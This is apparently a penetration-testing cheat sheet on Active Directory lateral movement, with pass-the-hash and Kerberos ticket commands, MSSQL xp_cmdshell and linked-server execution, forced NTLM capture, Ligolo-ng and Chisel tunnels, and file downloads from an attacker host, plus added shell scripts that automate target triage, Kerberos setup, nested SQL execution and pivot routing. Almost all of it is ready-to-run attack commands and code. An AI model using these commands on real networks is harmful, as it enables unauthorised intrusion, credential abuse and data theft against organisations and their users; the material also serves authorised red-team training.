Lateral Movement
You have credentials, hashes, or tickets. Time to move through the network, hop between hosts, and reach high-value targets.
Impacket Suite
Each tool uses a different execution method with different OPSEC tradeoffs.
PsExec (creates a service, drops a binary to disk). [SMB] [Requires Local Admin]
root@localhost:~# impacket-psexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>
WMIExec (stealthier, executes via WMI, no binary on disk; note that command output is still written to a temp file under ADMIN$ and read back over SMB). [WMI] [Requires Local Admin]
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>
SMBExec (creates a service, no binary dropped). [SMB] [Requires Local Admin]
root@localhost:~# impacket-smbexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>
AtExec (creates a scheduled task). [SMB] [Requires Local Admin]
root@localhost:~# impacket-atexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH> 'whoami'
DCOMExec (execution via DCOM objects). [DCOM] [Requires Local Admin]
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>
NetExec PTH
Execute a command via PTH. [SMB]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -x 'whoami'
PowerShell execution. [SMB]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -X 'Get-Process'
PTH across a subnet (find where you have admin). [SMB]
root@localhost:~# nxc smb <SUBNET>/24 -u <USER> -H <HASH>
Look for (Pwn3d!) in the output: that means local admin on that host.
Password-based (same tools, swap -hashes for creds)
root@localhost:~# impacket-psexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-smbexec <DOMAIN>/<USER>:<PASS>@<TARGET>
root@localhost:~# impacket-atexec <DOMAIN>/<USER>:<PASS>@<TARGET> 'whoami'
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<TARGET>
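The subnet sweep above gets useful once you turn its output into target lists. The script below is an added example (not from the original page or the NetExec project): it reads saved nxc smb output from stdin and separates hosts where the credential is local admin from hosts where it is merely valid. The sample lines are constructed to mimic the nxc line layout; the IPs, hostnames, user and <HASH> placeholder are made up.

```sh
#!/bin/sh
# Added example: triage NetExec SMB sweep output.
# Constructed sample in the nxc layout: "SMB  <ip>  <port>  <host>  [+|-|*] ...".
# Hosts, user and hash below are placeholders, not real data.
NXC_SAMPLE=$(cat <<'EOF'
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\jdoe:<HASH> (Pwn3d!)
SMB         10.10.10.6      445    WS01             [+] corp.local\jdoe:<HASH>
SMB         10.10.10.7      445    WS02             [-] corp.local\jdoe:<HASH> STATUS_LOGON_FAILURE
SMB         10.10.10.8      445    FS01             [+] corp.local\jdoe:<HASH> (Pwn3d!)
EOF
)

# Hosts where the credential is local admin: "[+]" result plus the "(Pwn3d!)" marker.
# Prints "<ip> <hostname>", deduplicated, read from stdin.
nxc_admin_hosts() {
    awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2, $4 }' | sort -u
}

# Hosts where the login worked but the account is not admin (candidates for
# WinRM/RDP group membership or further privilege escalation, not for psexec).
nxc_valid_nonadmin_hosts() {
    awk '$5 == "[+]" && !/\(Pwn3d!\)/ { print $2, $4 }' | sort -u
}

# IP-only list for feeding follow-up tools (one per line).
nxc_admin_targets() {
    nxc_admin_hosts | awk '{ print $1 }'
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$NXC_SAMPLE" | nxc_admin_hosts
# 10.10.10.5 DC01
# 10.10.10.8 FS01
```

In practice, save the sweep (`nxc smb <SUBNET>/24 -u <USER> -H <HASH> | tee sweep.log`) and run `nxc_admin_targets < sweep.log > admins.txt`; the admin list drives the Impacket commands above, the non-admin list drives the WinRM and RDP checks later on this page.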
Pass-the-Ticket
Request a TGT and use it for authentication. [Kerberos]
root@localhost:~# impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-psexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-pass
With hash.
root@localhost:~# impacket-getTGT <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-pass
Kerberos needs working name resolution: add the DC and target hostnames to /etc/hosts or point /etc/resolv.conf at the DC. Always use the hostname (not IP) with -k, because the service ticket is requested for the host's SPN (e.g. cifs/<TARGET_FQDN>) and an IP has no matching SPN.
Overpass-the-Hash
Convert an NTLM hash into a Kerberos TGT (useful when NTLM is restricted but Kerberos isn't). [Kerberos] A TGT requested with an NTLM hash is RC4-encrypted (etype 23), which stands out in 4768 events on domains that normally use AES; if you have the account's AES key, getTGT accepts -aesKey instead.
root@localhost:~# impacket-getTGT <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP>
root@localhost:~# export KRB5CCNAME=<USER>.ccache
# Now use any tool with Kerberos auth
root@localhost:~# impacket-wmiexec <DOMAIN>/<USER>@<TARGET_FQDN> -k -no-pass
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass
root@localhost:~# nxc smb <TARGET_FQDN> -u <USER> --use-kcache
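Both the Pass-the-Ticket and Overpass-the-Hash steps above fail in the same two ways: the client cannot find the KDC for the realm, or the target is given as an IP. The script below is an added example (not from the original page or from Impacket): it generates a minimal /etc/krb5.conf and /etc/hosts line for a domain and DC, and a pre-flight check that rejects IP literals and short names before you pass them to a -k command. Domain, DC and host names in the usage lines (corp.local, dc01, ws01) are placeholders.

```sh
#!/bin/sh
# Added example: Kerberos client plumbing for -k / --use-kcache.
# All names in the comments and usage lines are placeholders.

# Refuse IP literals and short names: Kerberos service tickets are issued for
# SPNs such as cifs/ws01.corp.local, so the target must be its FQDN.
require_fqdn() {
    case "$1" in
        *[!0-9.]*) ;;   # contains letters: not an IP literal
        *) echo "error: $1 is an IP; use the hostname with -k" >&2; return 1 ;;
    esac
    case "$1" in
        *.*) return 0 ;;
        *) echo "error: $1 is a short name; use the FQDN" >&2; return 1 ;;
    esac
}

# krb5_conf <domain> <dc_fqdn>: realm is the domain in upper case; DNS lookups
# are disabled so the config works even when the attack box is not using the
# domain's DNS.
krb5_conf() {
    domain=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    realm=$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')
    dc=$2
    cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    dns_lookup_realm = false
    forwardable = true

[realms]
    $realm = {
        kdc = $dc
        admin_server = $dc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# hosts_line <ip> <fqdn>: /etc/hosts entry with both FQDN and short name.
hosts_line() {
    printf '%s %s %s\n' "$1" "$2" "${2%%.*}"
}

# Usage (placeholders):
#   krb5_conf corp.local dc01.corp.local | sudo tee /etc/krb5.conf
#   hosts_line 10.10.10.5 dc01.corp.local | sudo tee -a /etc/hosts
#   require_fqdn ws01.corp.local && impacket-wmiexec corp.local/jdoe@ws01.corp.local -k -no-pass
hosts_line 10.10.10.5 dc01.corp.local
```

The same krb5.conf serves evil-winrm's -r <DOMAIN_FQDN> option and nxc --use-kcache; the realm name must be upper case, and the kdc entry must itself resolve, which is what the hosts line is for.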
WinRM
NetExec
Check WinRM access. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -p <PASS>
Execute a command. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -p <PASS> -x 'whoami'
With hash. [WinRM]
root@localhost:~# nxc winrm <TARGET> -u <USER> -H <HASH> -x 'whoami'
Evil-WinRM
Interactive shell with password. [WinRM]
root@localhost:~# evil-winrm -i <TARGET> -u <USER> -p <PASS>
With hash. [WinRM]
root@localhost:~# evil-winrm -i <TARGET> -u <USER> -H <HASH>
With Kerberos ticket (needs a krb5.conf realm entry so -r can find the KDC). [WinRM] [Kerberos]
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# evil-winrm -i <TARGET_FQDN> -r <DOMAIN_FQDN>
It also has built-in upload/download, an AMSI bypass (menu → Bypass-4MSI), and DLL loading. It's the best interactive shell option over WinRM.
RDP
Check RDP access. [RDP]
root@localhost:~# nxc rdp <TARGET> -u <USER> -p <PASS>
Connect via xfreerdp. [RDP]
root@localhost:~# xfreerdp /v:<TARGET> /u:<USER> /p:<PASS> /d:<DOMAIN> /cert-ignore +clipboard /dynamic-resolution
PTH over RDP (requires Restricted Admin mode enabled on the target). [RDP]
root@localhost:~# xfreerdp /v:<TARGET> /u:<USER> /pth:<HASH> /d:<DOMAIN> /cert-ignore
Enable Restricted Admin mode remotely (if you have admin access). This writes a registry value on the target; set it back to 1 or delete it when you are done. [Requires Local Admin]
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f'
MSSQL
Authentication
Check MSSQL access. [MSSQL]
root@localhost:~# nxc mssql <TARGET> -u <USER> -p <PASS>
Interactive MSSQL client. [MSSQL]
root@localhost:~# impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<TARGET>
With Windows (domain) authentication instead of a SQL login.
root@localhost:~# impacket-mssqlclient <DOMAIN>/<USER>:<PASS>@<TARGET> -windows-auth
Command Execution
Execute OS commands via NetExec. [MSSQL]
root@localhost:~# nxc mssql <TARGET> -u <USER> -p <PASS> -x 'whoami'
Enable xp_cmdshell manually (requires sysadmin on the instance).
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Linked Servers
Enumerate linked servers (can pivot to other SQL instances).
EXEC sp_linkedservers;
Execute queries on a linked server.
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT system_user');
Execute xp_cmdshell through a linked server. EXEC ... AT needs RPC Out enabled on the link, and the command runs as the remote instance's service account, not as you.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED_SERVER];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED_SERVER];
EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LINKED_SERVER];
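The three statements above show one hop. Each additional hop wraps the statement in another single-quoted string, so every quote inside doubles again, which is easy to get wrong by hand for two or more links. The script below is an added example (not from the original page): it builds the nested EXEC ... AT statement for an arbitrary chain and prints the sys.servers query to check RPC Out before trying. Server names SQL01/SQL02 are placeholders.

```sh
#!/bin/sh
# Added example: build nested EXEC ('...') AT [server] statements for
# multi-hop linked-server execution. Server names here are placeholders.

# Double single quotes so a statement can sit inside a T-SQL string literal.
sql_quote() {
    printf '%s' "$1" | sed "s/'/''/g"
}

# linked_chain "<T-SQL>" HOP1 HOP2 ...
# Runs <T-SQL> on the last hop, reached from the connected instance via
# HOP1 -> HOP2 -> ... (hops listed in traversal order, outermost first).
# Each hop needs is_rpc_out_enabled = 1 on the instance before it.
linked_chain() {
    stmt=$1; shift
    rev=""
    for hop in "$@"; do rev="$hop $rev"; done   # wrap innermost hop first
    for hop in $rev; do
        stmt="EXEC ('$(sql_quote "$stmt")') AT [$hop]"
    done
    printf '%s\n' "$stmt"
}

# linked_xp_cmdshell "<os command>" HOP1 HOP2 ...
# Emits the full recipe: enable advanced options and xp_cmdshell on the last
# hop, then run the command there. Runs as that instance's service account.
linked_xp_cmdshell() {
    cmd=$1; shift
    linked_chain "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;" "$@"
    linked_chain "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" "$@"
    linked_chain "EXEC xp_cmdshell '$(sql_quote "$cmd")';" "$@"
}

# Run this on each instance first: links with is_rpc_out_enabled = 0 will
# reject EXEC ... AT (OPENQUERY still works for reads on those).
rpc_out_check="SELECT name, is_rpc_out_enabled, is_data_access_enabled FROM sys.servers;"

# Stand-alone demo: two-hop chain.
linked_chain "SELECT @@SERVERNAME" SQL01 SQL02
# EXEC ('EXEC (''SELECT @@SERVERNAME'') AT [SQL02]') AT [SQL01]
```

Paste the printed statements into impacket-mssqlclient (or feed them with nxc mssql -q); the @@SERVERNAME probe confirms which instance you actually landed on before you enable xp_cmdshell there.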
Capture NTLM Hash via MSSQL
Force the SQL server to authenticate to your listener. [MSSQL]
EXEC xp_dirtree '\\<LISTENER_IP>\share';
Run your capture or relay listener on <LISTENER_IP> to catch the Net-NTLM authentication of the account running the SQL service (often the machine account); it can be relayed or cracked but not passed directly. xp_dirtree does not require sysadmin, and the SQL host must be able to reach <LISTENER_IP> on 445.
DCOM Execution
Execute commands via DCOM objects. [DCOM] [Requires Local Admin]
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<TARGET>
With hash.
root@localhost:~# impacket-dcomexec <DOMAIN>/<USER>@<TARGET> -hashes :<HASH>
SSH (Linux Targets in AD)
If Linux machines are domain-joined, domain credentials work for password authentication.
root@localhost:~# ssh <USER>@<TARGET>
With a Kerberos ticket.
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# ssh -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes <USER>@<TARGET_FQDN>
Tunneling & Pivoting
Ligolo-ng
Set up a tunnel for pivoting into internal networks.
# On attacker (start the proxy)
root@localhost:~# ./proxy -selfcert -laddr 0.0.0.0:11601
# On attacker (create the tun interface the tunnel will use; once per box)
root@localhost:~# sudo ip tuntap add user $USER mode tun ligolo
root@localhost:~# sudo ip link set ligolo up
# On target (run the agent)
PS C:\> .\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert
# In Ligolo proxy console
>> session # select the session
>> ifconfig # check target's internal interfaces
>> start # start the tunnel
# Add route on attacker to reach internal network (the network, not the agent's host address)
root@localhost:~# sudo ip route add 10.10.10.0/24 dev ligolo
Now you can interact with the internal network directly.
root@localhost:~# nxc smb 10.10.10.0/24
root@localhost:~# nmap -sC -sV 10.10.10.100
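The agent's ifconfig prints host addresses such as 10.10.10.5/24, while the route you add must be the network (10.10.10.0/24), and the tun interface has to exist before start. The script below is an added example (not from the original page or the Ligolo-ng project): it converts each agent address into its network and prints the attacker-side interface and route commands in order. The interface name ligolo and the sample addresses are placeholders.

```sh
#!/bin/sh
# Added example: derive Ligolo-ng routes from the agent's interface addresses.
# Interface name and addresses are placeholders.

# cidr_network 10.10.10.5/24 -> 10.10.10.0/24 (route the network, not the host)
cidr_network() {
    ip=${1%/*}; prefix=${1#*/}
    oldifs=$IFS; IFS=.; set -- $ip; IFS=$oldifs
    addr=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
    if [ "$prefix" -eq 0 ]; then
        mask=0
    else
        mask=$(( (4294967295 << (32 - $prefix)) & 4294967295 ))
    fi
    net=$(( addr & mask ))
    printf '%d.%d.%d.%d/%d\n' \
        $(( (net >> 24) & 255 )) $(( (net >> 16) & 255 )) \
        $(( (net >> 8) & 255 ))  $(( net & 255 )) "$prefix"
}

# ligolo_routes <iface> <addr/prefix>...: print the attacker-side commands.
# The tun device must exist (and be up) before `start` in the proxy console;
# one route per internal network the agent can see.
ligolo_routes() {
    iface=$1; shift
    echo "sudo ip tuntap add user \"\$USER\" mode tun $iface"
    echo "sudo ip link set $iface up"
    for a in "$@"; do
        echo "sudo ip route add $(cidr_network "$a") dev $iface"
    done
}

# Stand-alone demo; pipe into `sh` to apply.
ligolo_routes ligolo 10.10.10.5/24 172.16.37.200/20
# sudo ip tuntap add user "$USER" mode tun ligolo
# sudo ip link set ligolo up
# sudo ip route add 10.10.10.0/24 dev ligolo
# sudo ip route add 172.16.32.0/20 dev ligolo
```

Copy the addresses straight from the proxy's ifconfig output into the argument list; routing the /24 that contains the agent's own address is the common case, but a /20 or /16 on a second interface is where hand-computed routes usually go wrong.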
Ligolo-ng (Reverse Listener for File Transfer)
Create a listener on the agent side for file transfers or reverse shells: internal hosts connect to <AGENT_IP>:4444 and the traffic arrives at 127.0.0.1:4444 on the attacker.
# In Ligolo proxy console
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
Chisel
SOCKS proxy via Chisel.
# On attacker (server)
root@localhost:~# chisel server --reverse -p 8080
# On target (client, reverse SOCKS)
PS C:\> .\chisel.exe client <ATTACKER_IP>:8080 R:1080:socks
Port forward via Chisel.
# Forward target's port 3389 to attacker's localhost:3389 (then connect to 127.0.0.1:3389 on the attacker)
PS C:\> .\chisel.exe client <ATTACKER_IP>:8080 R:3389:127.0.0.1:3389
Using Proxychains
Configure /etc/proxychains4.conf:
socks5 127.0.0.1 1080
Then prefix any tool with proxychains.
root@localhost:~# proxychains4 nxc smb 10.10.10.0/24
root@localhost:~# proxychains4 impacket-psexec <DOMAIN>/<USER>:<PASS>@10.10.10.100
root@localhost:~# proxychains4 evil-winrm -i 10.10.10.100 -u <USER> -p <PASS>
SSH Tunneling (Quick Alternative)
Dynamic SOCKS proxy via SSH.
root@localhost:~# ssh -D 1080 -N -f <USER>@<PIVOT_HOST>
Local port forward.
root@localhost:~# ssh -L 8888:<INTERNAL_TARGET>:445 <USER>@<PIVOT_HOST>
File Transfer Methods
From Linux Attacker to Windows Target
Python HTTP server + certutil/PowerShell download.
# On attacker
root@localhost:~# python3 -m http.server 80
# On target
PS C:\> certutil -urlcache -f http://<ATTACKER_IP>/file.exe file.exe
PS C:\> powershell -c "(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>/file.exe','C:\Temp\file.exe')"
PS C:\> iwr -Uri http://<ATTACKER_IP>/file.exe -OutFile C:\Temp\file.exe
SMB Share
# On attacker (start SMB server)
root@localhost:~# impacket-smbserver share . -smb2support -username user -password pass
# On target
C:\> net use \\<ATTACKER_IP>\share /user:user pass
C:\> copy \\<ATTACKER_IP>\share\file.exe C:\Temp
Evil-WinRM Upload/Download
# Inside evil-winrm session
*Evil-WinRM* PS> upload /path/to/local/file.exe C:\Temp\file.exe
*Evil-WinRM* PS> download C:\Temp\loot.txt /path/to/local/loot.txt